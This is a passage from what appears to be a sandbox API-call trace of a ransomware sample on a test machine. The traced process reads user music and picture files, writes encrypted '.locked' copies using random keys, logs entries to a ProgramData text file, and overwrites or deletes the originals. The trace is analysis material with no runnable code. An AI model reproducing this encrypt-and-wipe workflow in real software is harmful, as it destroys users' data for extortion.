WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0310.740] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0310.740] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0310.740] SetEvent (hEvent=0x150) returned 1 [0310.740] SetEvent (hEvent=0x22c) returned 1 [0310.740] SetEvent (hEvent=0x12c) returned 1 [0310.740] SetEvent (hEvent=0x184) returned 1 [0310.765] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0310.768] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0310.768] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x0 [0310.769] SetEvent (hEvent=0x134) returned 1 [0310.769] SetEvent (hEvent=0x184) returned 1 [0310.769] SetEvent (hEvent=0x12c) returned 1 [0310.770] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0310.771] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb34, ulCount=0x10, ulNumEntriesRemoved=0x337efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb34, ulNumEntriesRemoved=0x337efb14) returned 0 [0310.771] SetEvent (hEvent=0x150) returned 1 [0310.771] SetEvent (hEvent=0x12c) returned 1 [0310.771] SetEvent (hEvent=0x184) returned 1 [0310.777] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Cg4wICSJ7X32.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\cg4wicsj7x32.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0310.789] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0310.950] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e7e88 | out: lpMode=0x125e7e88) returned 0 [0310.950] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0311.195] WriteFile (in: hFile=0x1e0, lpBuffer=0x13a3c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e7e78, lpOverlapped=0x0 | out: lpBuffer=0x13a3c000*, lpNumberOfBytesWritten=0x125e7e78*=0xfa000, lpOverlapped=0x0) returned 1 [0311.216] CloseHandle (hObject=0x1e0) returned 1 [0311.216] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Cg4wICSJ7X32.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\cg4wicsj7x32.mp3")) returned 1 [0311.464] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0311.675] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e7a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x125e7a24*=0xc) returned 1 [0311.677] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\rmbfWOcSo8.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\rmbfwocso8.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0311.677] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0311.677] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\rmbfWOcSo8.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\rmbfwocso8.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0311.678] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0311.678] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0311.678] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392060 | out: pbBuffer=0x12392060) returned 1 [0311.678] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0311.678] WriteFile (in: hFile=0x1c8, lpBuffer=0x12499000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x12499000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0311.681] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0311.684] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0311.684] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0311.684] SetEvent (hEvent=0x104) returned 1 [0311.684] SetEvent (hEvent=0x1d0) returned 1 [0311.684] ReadFile (in: hFile=0x208, lpBuffer=0x12964000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x12964000*, lpNumberOfBytesRead=0x125e7d68*=0xf20f, lpOverlapped=0x0) returned 1 [0311.687] WriteFile (in: hFile=0x1c8, lpBuffer=0x12964000*, nNumberOfBytesToWrite=0xf20f, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x12964000*, lpNumberOfBytesWritten=0x125e7d74*=0xf20f, lpOverlapped=0x0) returned 1 [0311.694] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0312.021] ReadFile (in: hFile=0x208, lpBuffer=0x12964000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x12964000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0312.021] CloseHandle (hObject=0x1c8) returned 1 [0312.404] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0312.441] CloseHandle (hObject=0x208) returned 1 [0312.442] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0312.442] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x125e7e94 | out: lpMode=0x125e7e94) returned 0 [0312.442] WriteFile (in: hFile=0x208, lpBuffer=0x1239a090*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x125e7e64, lpOverlapped=0x0 | out: lpBuffer=0x1239a090*, lpNumberOfBytesWritten=0x125e7e64*=0x30, lpOverlapped=0x0) returned 1 [0312.442] CloseHandle (hObject=0x208) returned 1 [0312.443] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\rmbfWOcSo8.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\rmbfwocso8.wav")) returned 1 [0312.496] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0312.714] SetEvent (hEvent=0x1f0) returned 1 [0312.714] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0312.721] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0312.722] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x123a3a24*=0xc) returned 1 [0312.777] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\8IVRLBXd.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\8ivrlbxd.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0312.777] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0312.777] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\8IVRLBXd.jpg.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\8ivrlbxd.jpg.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0312.778] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0312.778] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0312.778] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8040 | out: pbBuffer=0x124a8040) returned 1 [0312.778] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340581 | out: pbBuffer=0x12340581) returned 1 [0312.778] WriteFile (in: hFile=0x200, lpBuffer=0x12705000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x12705000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0312.783] ReadFile (in: hFile=0x1bc, lpBuffer=0x1444e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x1444e000*, lpNumberOfBytesRead=0x123a3d68*=0x2344, lpOverlapped=0x0) returned 1 [0312.786] WriteFile (in: hFile=0x200, lpBuffer=0x1444e000*, nNumberOfBytesToWrite=0x2344, lpNumberOfBytesWritten=0x123a3d74, lpOverlapped=0x0 | out: lpBuffer=0x1444e000*, lpNumberOfBytesWritten=0x123a3d74*=0x2344, lpOverlapped=0x0) returned 1 [0312.798] ReadFile (in: hFile=0x1bc, lpBuffer=0x1444e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x1444e000*, lpNumberOfBytesRead=0x123a3d68*=0x0, lpOverlapped=0x0) returned 1 [0312.798] CloseHandle (hObject=0x200) returned 1 [0312.798] CloseHandle (hObject=0x1bc) returned 1 [0312.799] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0312.799] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x123a3e94 | out: lpMode=0x123a3e94) returned 0 [0312.799] WriteFile (in: hFile=0x1bc, lpBuffer=0x12340800*, nNumberOfBytesToWrite=0x73, lpNumberOfBytesWritten=0x123a3e64, lpOverlapped=0x0 | out: lpBuffer=0x12340800*, lpNumberOfBytesWritten=0x123a3e64*=0x73, lpOverlapped=0x0) returned 1 [0312.799] CloseHandle (hObject=0x1bc) returned 1 [0312.799] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\8IVRLBXd.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\8ivrlbxd.jpg")) returned 1 [0312.854] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0312.921] SetEvent (hEvent=0x22c) returned 1 [0312.921] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0312.925] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\TwlVh5-7kS4lpqivPrW.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\twlvh5-7ks4lpqivprw.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0312.925] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125d9d9c | out: lpMode=0x125d9d9c) returned 0 [0312.925] WriteFile (in: hFile=0x218, lpBuffer=0x13672000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a3e78, lpOverlapped=0x0 | out: lpBuffer=0x13672000*, lpNumberOfBytesWritten=0x124a3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.968] CloseHandle (hObject=0x218) returned 1 [0312.969] SetEvent (hEvent=0x20c) returned 1 [0312.969] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.001] SetEvent (hEvent=0x1f0) returned 1 [0313.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e0a0 | out: pbBuffer=0x1263e0a0) returned 1 [0313.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766090 | out: pbBuffer=0x12766090) returned 1 [0313.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c301 | out: pbBuffer=0x1237c301) returned 1 [0313.001] WriteFile (in: hFile=0x1c0, lpBuffer=0x12653000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a1d78, lpOverlapped=0x0 | out: lpBuffer=0x12653000*, lpNumberOfBytesWritten=0x123a1d78*=0x80, lpOverlapped=0x0) returned 1 [0313.003] SetEvent (hEvent=0x20c) returned 1 [0313.003] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.049] ReadFile (in: hFile=0x1bc, lpBuffer=0x142d6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125dfd68, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesRead=0x125dfd68*=0x5dc, lpOverlapped=0x0) returned 1 [0313.050] WriteFile (in: hFile=0x1c0, lpBuffer=0x12653000*, nNumberOfBytesToWrite=0x5dc, lpNumberOfBytesWritten=0x125dfd78, lpOverlapped=0x0 | out: lpBuffer=0x12653000*, lpNumberOfBytesWritten=0x125dfd78*=0x5dc, lpOverlapped=0x0) returned 1 [0313.051] ReadFile (in: hFile=0x1bc, lpBuffer=0x142d6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125dfd68, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesRead=0x125dfd68*=0x0, lpOverlapped=0x0) returned 1 [0313.051] CloseHandle (hObject=0x1c0) returned 1 [0313.051] CloseHandle (hObject=0x1bc) returned 1 [0313.052] SetEvent (hEvent=0x1f0) returned 1 [0313.052] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.058] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.069] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.079] SetEvent (hEvent=0x190) returned 1 [0313.079] WriteFile (in: hFile=0x218, lpBuffer=0x12a7e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125d9e78, lpOverlapped=0x0 | out: lpBuffer=0x12a7e000*, lpNumberOfBytesWritten=0x125d9e78*=0xfa000, lpOverlapped=0x0) returned 1 [0313.105] CloseHandle (hObject=0x218) returned 1 [0313.106] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\CL8lPpx69.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\cl8lppx69.png")) returned 1 [0313.154] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.178] SetEvent (hEvent=0x20c) returned 1 [0313.178] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.182] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.246] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0313.246] SetEvent (hEvent=0x214) returned 1 [0313.246] SetEvent (hEvent=0x198) returned 1 [0313.246] SetEvent (hEvent=0x134) returned 1 [0313.378] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\0ue1Rq8s_.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\0ue1rq8s_.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0313.504] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.587] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1249ce88 | out: lpMode=0x1249ce88) returned 0 [0313.587] WriteFile (in: hFile=0x218, lpBuffer=0x12df0000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249ce78, lpOverlapped=0x0 | out: lpBuffer=0x12df0000*, lpNumberOfBytesWritten=0x1249ce78*=0xfa000, lpOverlapped=0x0) returned 1 [0313.610] CloseHandle (hObject=0x218) returned 1 [0313.611] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\0ue1Rq8s_.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\0ue1rq8s_.bmp")) returned 1 [0313.662] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.700] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.701] SetEvent (hEvent=0x184) returned 1 [0313.701] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.706] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.709] SetEvent (hEvent=0x184) returned 1 [0313.709] SetEvent (hEvent=0x12c) returned 1 [0313.709] SwitchToThread () returned 1 [0313.823] SwitchToThread () returned 1 [0313.825] SetEvent (hEvent=0x184) returned 1 [0313.825] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.826] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.928] SetEvent (hEvent=0x214) returned 1 [0313.928] SetEvent (hEvent=0x190) returned 1 [0313.929] SetEvent (hEvent=0x184) returned 1 [0313.929] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.935] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.959] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.962] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0313.965] SetEvent (hEvent=0x12c) returned 1 [0313.965] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\J_R4xdyvB0.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\j_r4xdyvb0.mp3")) returned 1 [0314.030] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.110] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.113] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.116] SetEvent (hEvent=0x20c) returned 1 [0314.116] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.148] SetEvent (hEvent=0x220) returned 1 [0314.148] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.155] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.377] SetEvent (hEvent=0x22c) returned 1 [0314.377] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.385] SetEvent (hEvent=0x20c) returned 1 [0314.385] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.417] SetEvent (hEvent=0x20c) returned 1 [0314.417] SetEvent (hEvent=0x22c) returned 1 [0314.417] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.537] SetEvent (hEvent=0x14c) returned 1 [0314.537] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x0 [0314.541] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x0 [0314.544] SetEvent (hEvent=0x14c) returned 1 [0314.544] SetEvent (hEvent=0x220) returned 1 [0314.544] SetEvent (hEvent=0x20c) returned 1 [0314.544] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.549] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb34, ulCount=0x10, ulNumEntriesRemoved=0x337efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb34, ulNumEntriesRemoved=0x337efb14) returned 0 [0314.549] SetEvent (hEvent=0x20c) returned 1 [0314.549] SetEvent (hEvent=0x220) returned 1 [0314.549] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12657a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x12657a24*=0xc) returned 1 [0314.551] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\Y7n QDyh jI\\PigWS92hdGvp7.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\y7n qdyh ji\\pigws92hdgvp7.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0314.551] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0314.552] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\Y7n QDyh jI\\PigWS92hdGvp7.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\y7n qdyh ji\\pigws92hdgvp7.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0314.685] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.775] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0314.775] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0314.775] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e040 | out: pbBuffer=0x1234e040) returned 1 [0314.775] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714181 | out: pbBuffer=0x12714181) returned 1 [0314.776] WriteFile (in: hFile=0x19c, lpBuffer=0x124c9000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12657d78, lpOverlapped=0x0 | out: lpBuffer=0x124c9000*, lpNumberOfBytesWritten=0x12657d78*=0x80, lpOverlapped=0x0) returned 1 [0314.779] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x0 [0314.781] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0314.781] SetEvent (hEvent=0x150) returned 1 [0314.781] SetEvent (hEvent=0x14c) returned 1 [0314.781] SetEvent (hEvent=0x214) returned 1 [0314.781] ReadFile (in: hFile=0x218, lpBuffer=0x142d6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesRead=0x12657d68*=0x17e78, lpOverlapped=0x0) returned 1 [0314.788] WriteFile (in: hFile=0x19c, lpBuffer=0x142d6000*, nNumberOfBytesToWrite=0x17e78, lpNumberOfBytesWritten=0x12657d74, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesWritten=0x12657d74*=0x17e78, lpOverlapped=0x0) returned 1 [0314.818] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0314.839] ReadFile (in: hFile=0x218, lpBuffer=0x142d6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesRead=0x12657d68*=0x0, lpOverlapped=0x0) returned 1 [0314.839] CloseHandle (hObject=0x19c) returned 1 [0314.840] CloseHandle (hObject=0x218) returned 1 [0314.840] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0314.840] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12657e94 | out: lpMode=0x12657e94) returned 0 [0314.840] WriteFile (in: hFile=0x218, lpBuffer=0x125a6120*, nNumberOfBytesToWrite=0x83, lpNumberOfBytesWritten=0x12657e64, lpOverlapped=0x0 | out: lpBuffer=0x125a6120*, lpNumberOfBytesWritten=0x12657e64*=0x83, lpOverlapped=0x0) returned 1 [0314.840] CloseHandle (hObject=0x218) returned 1 [0314.840] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\Y7n QDyh jI\\PigWS92hdGvp7.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\y7n qdyh ji\\pigws92hdgvp7.bmp")) returned 1 [0314.913] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0315.005] CreateFileW 